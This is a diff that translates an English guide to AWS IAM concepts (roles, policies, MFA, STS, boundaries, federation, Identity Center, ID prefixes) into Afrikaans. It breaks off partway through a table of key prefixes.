sekuriteit/voorval respons rolle om verwyder of - modified. +gewysig te word. 
-- Deny backups from being deleted. -- Deny creating IAM users and access keys +- Weier rugsteun om verwyder te word. +- Weier die skep van IAM gebruikers en toegang sleutels -Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) +Vind **JSON voorbeelde** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) ### ARN -**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this: - +**Amazon Resource Name** is die **unieke naam** wat elke hulpbron binne AWS het, dit is soos volg saamgestel: ``` arn:partition:service:region:account-id:resource-type/resource-id arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env ``` - -Note that there are 4 partitions in AWS but only 3 ways to call them: +Note dat daar 4 partities in AWS is, maar slegs 3 maniere om hulle te noem: - AWS Standard: `aws` - AWS China: `aws-cn` -- AWS US public Internet (GovCloud): `aws-us-gov` +- AWS US publieke Internet (GovCloud): `aws-us-gov` - AWS Secret (US Classified): `aws` -## IAM - Identity and Access Management +## IAM - Identiteit en Toegang Bestuur -IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. +IAM is die diens wat jou sal toelaat om **Verifikasie**, **Magtiging** en **Toegangsbeheer** binne jou AWS-rekening te bestuur. -- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. 
-- **Access Control** - The method and process of how access is granted to a secure resource +- **Verifikasie** - Proses om 'n identiteit te definieer en die verifikasie van daardie identiteit. Hierdie proses kan onderverdeel word in: Identifikasie en verifikasie. +- **Magtiging** - Bepaal wat 'n identiteit kan toegang tot binne 'n stelsel nadat dit geverifieer is. +- **Toegangsbeheer** - Die metode en proses van hoe toegang tot 'n veilige hulpbron toegestaan word. -IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. +IAM kan gedefinieer word deur sy vermoĂ« om verifikasie, magtiging en toegangsbeheer meganismes van identiteite na jou hulpbronne binne jou AWS-rekening te bestuur, te beheer en te regeer. -### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) +### [AWS rekening wortel gebruiker](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) -When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**. +Wanneer jy vir die eerste keer 'n Amazon Web Services (AWS) rekening skep, begin jy met 'n enkele aanmeld identiteit wat **volledige toegang tot alle** AWS dienste en hulpbronne in die rekening het. Dit is die AWS rekening _**wortel gebruiker**_ en word verkry deur in te teken met die **e-posadres en wagwoord wat jy gebruik het om die rekening te skep**. -Note that a new **admin user** will have **less permissions that the root user**. +Let daarop dat 'n nuwe **admin gebruiker** **minder toestemmings sal hĂȘ as die wortel gebruiker**. 
-From a security point of view, it's recommended to create other users and avoid using this one. +Vanuit 'n sekuriteits oogpunt, word dit aanbeveel om ander gebruikers te skep en om hierdie een te vermy. -### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) +### [IAM gebruikers](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) -An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys). +'n IAM _gebruiker_ is 'n entiteit wat jy in AWS skep om **die persoon of toepassing** wat dit gebruik om **met AWS te kommunikeer** te **verteenwoordig**. 'n Gebruiker in AWS bestaan uit 'n naam en geloofsbriewe (wagwoord en tot twee toegang sleutels). -When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user. +Wanneer jy 'n IAM gebruiker skep, gee jy dit **toestemmings** deur dit 'n **lid van 'n gebruikersgroep** te maak wat toepaslike toestemming beleide het (aanbeveel), of deur **beleide direk aan die gebruiker te heg**. -Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)). +Gebruikers kan **MFA geaktiveer hĂȘ om in te teken** deur die konsole. API tokens van MFA geaktiveerde gebruikers is nie deur MFA beskerm nie. 
As jy wil **die toegang van 'n gebruiker se API sleutels met MFA beperk**, moet jy in die beleid aandui dat om sekere aksies uit te voer, MFA teenwoordig moet wees (voorbeeld [**hier**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)). #### CLI -- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). +- **Toegang Sleutel ID**: 20 ewekansige hoofletters alfanumeriese karakters soos AKHDNAPO86BSHKDIRYT +- **Geheime toegang sleutel ID**: 40 ewekansige hoĂ« en lae letters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (Dit is nie moontlik om verlore geheime toegang sleutel ID's te herstel nie). -Whenever you need to **change the Access Key** this is the process you should follow:\ -&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ +Wanneer jy die **Toegang Sleutel** moet **verander**, is dit die proses wat jy moet volg:\ +&#xNAN;_Create 'n nuwe toegang sleutel -> Pas die nuwe sleutel toe op stelsel/toepassing -> merk oorspronklike een as inaktief -> Toets en verifieer dat die nuwe toegang sleutel werk -> Verwyder ou toegang sleutel_ -### MFA - Multi Factor Authentication +### MFA - Multi Faktor Verifikasie -It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\ -You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. 
+Dit word gebruik om 'n **addisionele faktor vir verifikasie** te skep benewens jou bestaande metodes, soos wagwoord, en skep dus 'n multi-faktor vlak van verifikasie.\ +Jy kan 'n **gratis virtuele toepassing of 'n fisiese toestel** gebruik. Jy kan toepassings soos google verifikasie gratis gebruik om 'n MFA in AWS te aktiveer. -Policies with MFA conditions can be attached to the following: +Beleide met MFA voorwaardes kan aan die volgende geheg word: -- An IAM user or group -- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic -- The trust policy of an IAM role that can be assumed by a user - -If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\ -Note that **`AssumeRole` credentials don't contain this information**. +- 'n IAM gebruiker of groep +- 'n hulpbron soos 'n Amazon S3 emmer, Amazon SQS tou, of Amazon SNS onderwerp +- Die vertrouensbeleid van 'n IAM rol wat deur 'n gebruiker aanvaar kan word +As jy 'n hulpbron wil **toegang via CLI** wat **MFA nagaan**, moet jy **`GetSessionToken`** aanroep. Dit sal vir jou 'n token gee met inligting oor MFA.\ +Let daarop dat **`AssumeRole` geloofsbriewe nie hierdie inligting bevat nie**. ```bash aws sts get-session-token --serial-number --token-code ``` +As [**hier genoem**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), daar is 'n baie verskillende gevalle waar **MFA nie gebruik kan word** nie. -As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**. 
+### [IAM gebruikersgroepe](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) -### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) +'n IAM [gebruikersgroep](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is 'n manier om **beleide aan verskeie gebruikers** op een slag te **koppel**, wat dit makliker kan maak om die toestemmings vir daardie gebruikers te bestuur. **Rol en groepe kan nie deel wees van 'n groep** nie. -An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**. +Jy kan 'n **identiteitsgebaseerde beleid aan 'n gebruikersgroep** koppel sodat al die **gebruikers** in die gebruikersgroep **die beleid se toestemmings ontvang**. Jy **kan nie** 'n **gebruikersgroep** as 'n **`Principal`** in 'n **beleid** identifiseer (soos 'n hulpbron-gebaseerde beleid) nie, omdat groepe met toestemmings verband hou, nie verifikasie nie, en principals is geverifieerde IAM entiteite. -You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities. +Hier is 'n paar belangrike eienskappe van gebruikersgroepe: -Here are some important characteristics of user groups: +- 'n gebruikers **groep** kan **baie gebruikers** **bevat**, en 'n **gebruiker** kan **tot verskeie groepe behoort**. +- **Gebruikersgroepe kan nie geneste** wees nie; hulle kan slegs gebruikers bevat, nie ander gebruikersgroepe nie. +- Daar is **geen standaard gebruikersgroep wat outomaties al die gebruikers in die AWS-rekening insluit** nie. 
As jy 'n gebruikersgroep soos dit wil hĂȘ, moet jy dit skep en elke nuwe gebruiker daaraan toewys. +- Die aantal en grootte van IAM hulpbronne in 'n AWS-rekening, soos die aantal groepe, en die aantal groepe waarvan 'n gebruiker 'n lid kan wees, is beperk. Vir meer inligting, sien [IAM en AWS STS kwotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). -- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. -- **User groups can't be nested**; they can contain only users, not other user groups. -- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. -- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). +### [IAM rolle](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) -### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) +'n IAM **rol** is baie **soortgelyk** aan 'n **gebruiker**, in die sin dat dit 'n **identiteit met toestemmingbeleide is wat bepaal wat** dit kan en nie kan doen in AWS nie. egter, 'n rol **het nie enige geloofsbriewe** (wagwoord of toegang sleutels) wat daarmee geassosieer is nie. In plaas daarvan om uniek aan een persoon geassosieer te wees, is 'n rol bedoel om **aangenome te word deur enigeen wat dit nodig het (en genoeg perms het)**. 'n **IAM gebruiker kan 'n rol aanvaar om tydelik** verskillende toestemmings vir 'n spesifieke taak aan te neem. 'n rol kan **toegeken word aan 'n** [**gefedereerde gebruiker**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) wat aanmeld deur 'n eksterne identiteitsverskaffer te gebruik in plaas van IAM. 
-An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM. +'n IAM rol bestaan uit **twee tipes beleide**: 'n **vertrouensbeleid**, wat nie leeg kan wees nie, wat **definieer wie die rol kan aanvaar**, en 'n **toestemmingsbeleid**, wat nie leeg kan wees nie, wat **definieer wat dit kan toegang**. -An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**. +#### AWS Sekuriteits Token Diens (STS) -#### AWS Security Token Service (STS) +AWS Sekuriteits Token Diens (STS) is 'n webdiens wat die **uitreiking van tydelike, beperkte bevoegdhede** fasiliteer. Dit is spesifiek ontwerp vir: -AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for: +### [Tydelike geloofsbriewe in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) -### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) +**Tydelike geloofsbriewe word hoofsaaklik gebruik met IAM rolle**, maar daar is ook ander gebruike. Jy kan tydelike geloofsbriewe aan vra wat 'n meer beperkte stel toestemmings het as jou standaard IAM gebruiker. 
Dit **verhoed** dat jy **per ongeluk take uitvoer wat nie toegelaat word** deur die meer beperkte geloofsbriewe nie. 'n voordeel van tydelike geloofsbriewe is dat hulle outomaties verval na 'n bepaalde tydperk. Jy het beheer oor die duur waarvoor die geloofsbriewe geldig is. -**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid. +### Beleide -### Policies +#### Beleidstoestemmings -#### Policy Permissions +Word gebruik om toestemmings toe te ken. Daar is 2 tipes: -Are used to assign permissions. There are 2 types: - -- AWS managed policies (preconfigured by AWS) -- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. - -By **default access** is **denied**, access will be granted if an explicit role has been specified.\ -If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). +- AWS bestuurde beleide (voorgeskrewe deur AWS) +- Klant bestuurde beleide: Geconfigureer deur jou. Jy kan beleide skep gebaseer op AWS bestuurde beleide (een van hulle wysig en jou eie skep), deur die beleidgenerator te gebruik (n GUI-weergave wat jou help om toestemmings toe te ken en te weier) of jou eie te skryf. 
+Deur **standaard toegang** is **weggeneem**, toegang sal toegestaan word as 'n eksplisiete rol gespesifiseer is.\ +As **enkele "Weier" bestaan, sal dit die "Toelaat" oorskry**, behalwe vir versoeke wat die AWS-rekening se wortel sekuriteitsgeloofsbriewe gebruik (wat standaard toegelaat word). ```javascript { - "Version": "2012-10-17", //Version of the policy - "Statement": [ //Main element, there can be more than 1 entry in this array - { - "Sid": "Stmt32894y234276923" //Unique identifier (optional) - "Effect": "Allow", //Allow or deny - "Action": [ //Actions that will be allowed or denied - "ec2:AttachVolume", - "ec2:DetachVolume" - ], - "Resource": [ //Resource the action and effect will be applied to - "arn:aws:ec2:*:*:volume/*", - "arn:aws:ec2:*:*:instance/*" - ], - "Condition": { //Optional element that allow to control when the permission will be effective - "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} - } - } - ] +"Version": "2012-10-17", //Version of the policy +"Statement": [ //Main element, there can be more than 1 entry in this array +{ +"Sid": "Stmt32894y234276923" //Unique identifier (optional) +"Effect": "Allow", //Allow or deny +"Action": [ //Actions that will be allowed or denied +"ec2:AttachVolume", +"ec2:DetachVolume" +], +"Resource": [ //Resource the action and effect will be applied to +"arn:aws:ec2:*:*:volume/*", +"arn:aws:ec2:*:*:instance/*" +], +"Condition": { //Optional element that allow to control when the permission will be effective +"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} +} +} +] } ``` +Die [globale velde wat gebruik kan word vir voorwaardes in enige diens is hier gedokumenteer](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ +Die [spesifieke velde wat gebruik kan word vir voorwaardes per diens is hier 
gedokumenteer](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). -The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ -The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). +#### Inline Beleide -#### Inline Policies +Hierdie tipe beleide is **direk toegeken** aan 'n gebruiker, groep of rol. Dan verskyn hulle nie in die Beleide lys nie soos enige ander een kan hulle gebruik.\ +Inline beleide is nuttig as jy wil **'n streng een-tot-een verhouding tussen 'n beleid en die identiteit** wat dit toegepas word, handhaaf. Byvoorbeeld, jy wil seker maak dat die toestemmings in 'n beleid nie per ongeluk aan 'n identiteit anders as die een waarvoor hulle bedoel is, toegeken word nie. Wanneer jy 'n inline beleid gebruik, kan die toestemmings in die beleid nie per ongeluk aan die verkeerde identiteit geheg word nie. Boonop, wanneer jy die AWS Bestuurskonsol gebruik om daardie identiteit te verwyder, word die beleide wat in die identiteit ingebed is, ook verwyder. Dit is omdat hulle deel van die hoof entiteit is. -This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\ -Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. 
In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. +#### Hulpbron Emmer Beleide -#### Resource Bucket Policies +Hierdie is **beleide** wat in **hulpbronne** gedefinieer kan word. **Nie alle hulpbronne van AWS ondersteun hulle nie**. -These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**. +As 'n hoof nie 'n eksplisiete weiering op hulle het nie, en 'n hulpbronbeleid hulle toegang gee, dan word hulle toegelaat. -If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed. +### IAM Grense -### IAM Boundaries +IAM grense kan gebruik word om **die toestemmings wat 'n gebruiker of rol toegang tot moet hĂȘ, te beperk**. Op hierdie manier, selfs al word 'n ander stel toestemmings aan die gebruiker toegeken deur 'n **ander beleid**, sal die operasie **misluk** as hy probeer om hulle te gebruik. -IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them. +'n Grens is net 'n beleid wat aan 'n gebruiker geheg is wat **die maksimum vlak van toestemmings wat die gebruiker of rol kan hĂȘ, aandui**. So, **selfs al het die gebruiker Administrateur toegang**, as die grens aandui dat hy slegs S· emmers kan lees, is dit die maksimum wat hy kan doen. -A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do. 
+**Dit**, **SCPs** en **die beginsel van die minste voorreg** is die maniere om te beheer dat gebruikers nie meer toestemmings het as wat hulle nodig het nie. -**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs. +### Sessie Beleide -### Session Policies - -A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has). - -This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised. +'n Sessie beleid is 'n **beleid wat ingestel word wanneer 'n rol aanvaar word** op een of ander manier. Dit sal soos 'n **IAM grens vir daardie sessie wees**: Dit beteken dat die sessie beleid nie toestemmings toeken nie, maar **beperk hulle tot diegene wat in die beleid aangedui word** (met die maksimum toestemmings wat die rol het). +Dit is nuttig vir **veiligheidsmaatreĂ«ls**: Wanneer 'n admin 'n baie bevoorregte rol gaan aanvaar, kan hy die toestemming beperk tot slegs diegene wat in die sessie beleid aangedui word in die geval dat die sessie gecompromitteer word. ```bash aws sts assume-role \ - --role-arn \ - --role-session-name \ - [--policy-arns ] - [--policy ] +--role-arn \ +--role-session-name \ +[--policy-arns ] +[--policy ] ``` +Note dat **AWS dalk sessiebeleide aan sessies kan voeg** wat gegenereer gaan word weens derde redes. 
Byvoorbeeld, in [nie-geverifieerde cognito aangeneemde rolle](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) sal AWS standaard (met verbeterde verifikasie) **sessie-akkrediteer met 'n sessiebeleid** genereer wat die dienste wat die sessie kan toegang hĂȘ, beperk [**tot die volgende lys**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services). -Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services). +As jy dus op 'n stadium die fout "
 omdat geen sessiebeleid dit toelaat nie 
" teĂ«kom, en die rol toegang het om die aksie uit te voer, is dit omdat **daar 'n sessiebeleid is wat dit verhinder**. -Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**. +### Identiteitsfederasie -### Identity Federation +Identiteitsfederasie **laat gebruikers van identiteitsverskaffers wat eksterne** is tot AWS toe om AWS-hulpbronne veilig te benader sonder om AWS-gebruikersakkrediteer van 'n geldige IAM-gebruikersrekening te verskaf.\ +'n Voorbeeld van 'n identiteitsverskaffer kan jou eie korporatiewe **Microsoft Active Directory** (via **SAML**) of **OpenID** dienste (soos **Google**) wees. Gefedereerde toegang sal dan die gebruikers binne dit toelaat om AWS te benader. -Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\ -An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS. +Om hierdie vertroue te konfigureer, word 'n **IAM Identiteitsverskaffer gegenereer (SAML of OAuth)** wat die **ander platform** sal **vertrou**. Dan word ten minste een **IAM rol (wat vertrou) aan die Identiteitsverskaffer toegeken**. As 'n gebruiker van die vertroude platform AWS benader, sal hy as die genoemde rol toegang hĂȘ. -To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role. 
+### IAM Identiteitsentrum -However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other. +AWS IAM Identiteitsentrum (opvolger van AWS Enkelteken) brei die vermoĂ«ns van AWS Identiteits- en Toegangsbestuur (IAM) uit om 'n **sentraal plek** te bied wat die **administrasie van gebruikers en hul toegang tot AWS** rekeninge en wolktoepassings saambring. -
+Die aanmelddomein gaan iets soos `.awsapps.com` wees. -### IAM Identity Center +Om gebruikers aan te meld, is daar 3 identiteitsbronne wat gebruik kan word: -AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications. +- Identiteitsentrum Gids: Gereelde AWS gebruikers +- Aktiewe Gids: Ondersteun verskillende konnektore +- Eksterne Identiteitsverskaffer: Alle gebruikers en groepe kom van 'n eksterne Identiteitsverskaffer (IdP) -The login domain is going to be something like `.awsapps.com`. +In die eenvoudigste geval van die Identiteitsentrum gids, sal die **Identiteitsentrum 'n lys van gebruikers & groepe hĂȘ** en sal in staat wees om **beleide** aan hulle toe te ken vir **enige van die rekeninge** van die organisasie. -To login users, there are 3 identity sources that can be used: - -- Identity Center Directory: Regular AWS users -- Active Directory: Supports different connectors -- External Identity Provider: All users and groups come from an external Identity Provider (IdP) - -
- -In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization. - -In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account. +Om toegang aan 'n Identiteitsentrum gebruiker/groep tot 'n rekening te gee, sal 'n **SAML Identiteitsverskaffer wat die Identiteitsentrum vertrou, geskep word**, en 'n **rol wat die Identiteitsverskaffer met die aangeduide beleide vertrou, sal in die bestemmingsrekening geskep word**. #### AwsSSOInlinePolicy -It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**. +Dit is moontlik om **toestemmings via inline beleide aan rolle wat via IAM Identiteitsentrum geskep is, te gee**. Die rolle wat in die rekeninge geskep word wat **inline beleide in AWS Identiteitsentrum** ontvang, sal hierdie toestemmings in 'n inline beleid genaamd **`AwsSSOInlinePolicy`** hĂȘ. -Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**. +Daarom, selfs al sien jy 2 rolle met 'n inline beleid genaamd **`AwsSSOInlinePolicy`**, beteken dit **nie dat dit dieselfde toestemmings het nie**. -### Cross Account Trusts and Roles +### Kruisrekening Vertroue en Rolle -**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. 
Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ -It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. +**'n gebruiker** (wat vertrou) kan 'n Kruisrekening Rol met sommige beleide skep en dan **'n ander gebruiker** (wat vertrou) toelaat om **sy rekening te benader** maar slegs **met die toegang wat in die nuwe rolbeleide aangedui is**. Om dit te skep, skep eenvoudig 'n nuwe Rol en kies Kruisrekening Rol. Rolle vir Kruisrekening Toegang bied twee opsies. Om toegang te bied tussen AWS rekeninge wat jy besit, en om toegang te bied tussen 'n rekening wat jy besit en 'n derdeparty AWS rekening.\ +Dit word aanbeveel om **die gebruiker wat vertrou is spesifiek aan te dui en nie 'n generiese ding te plaas nie**, want anders kan ander geverifieerde gebruikers soos gefedereerde gebruikers ook hierdie vertroue misbruik. -### AWS Simple AD +### AWS Eenvoudige AD -Not supported: +Nie ondersteun nie: -- Trust Relations -- AD Admin Center -- Full PS API support -- AD Recycle Bin -- Group Managed Service Accounts -- Schema Extensions -- No Direct access to OS or Instances +- Vertrouensverhoudings +- AD Admin Sentrum +- Volledige PS API ondersteuning +- AD Herwinningsblik +- Groep Gemanagte Diensrekeninge +- Skema-uitbreidings +- Geen Direkte toegang tot OS of Instansies nie -#### Web Federation or OpenID Authentication +#### Web Federasie of OpenID Verifikasie -The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS. +Die toepassing gebruik die AssumeRoleWithWebIdentity om tydelike akkrediteer te skep. Dit gee egter nie toegang tot die AWS-konsol nie, net toegang tot hulpbronne binne AWS. 
-### Other IAM options +### Ander IAM opsies -- You can **set a password policy setting** options like minimum length and password requirements. -- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. +- Jy kan **'n wagwoordbeleid instelling** opsies soos minimum lengte en wagwoordvereistes stel. +- Jy kan **"Akkrediteer Verslag" aflaai** met inligting oor huidige akkrediteer (soos gebruikers skeppingstyd, is wagwoord geaktiveer...). Jy kan 'n akkrediteer verslag genereer so dikwels as een keer elke **vier uur**. -AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**. +AWS Identiteits- en Toegangsbestuur (IAM) bied **fyn-graad toegangbeheer** oor al die AWS. Met IAM kan jy spesifiseer **wie toegang het tot watter dienste en hulpbronne**, en onder watter omstandighede. Met IAM beleide bestuur jy toestemmings aan jou werksmag en stelsels om **minste-bevoegdheidstoestemmings** te verseker. 
-### IAM ID Prefixes +### IAM ID Vooraf -In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature: +In [**hierdie bladsy**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) kan jy die **IAM ID vooraf** van sleutels vind, afhangende van hul aard: -| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | +| ABIA | [AWS STS diens draer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | | ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| ACCA | Context-specific credential | -| AGPA | User group | -| AIDA | IAM user | -| AIPA | Amazon EC2 instance profile | -| AKIA | Access key | -| ANPA | Managed policy | -| ANVA | Version in a managed policy | -| APKA | Public key | -| AROA | Role | -| ASCA | Certificate | -| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. | +| ACCA | Konteks-spesifieke akkrediteer | +| AGPA | Gebruikersgroep | +| AIDA | IAM gebruiker | +| AIPA | Amazon EC2 instansieprofiel | +| AKIA | Toegangssleutel | +| ANPA | Gemanagte beleid | +| ANVA | Weergawe in 'n gemanagte beleid | +| APKA | Publieke sleutel | +| AROA | Rol | +| ASCA | Sertifikaat | +| ASIA | [Tydelike (AWS STS) toegangssleutel 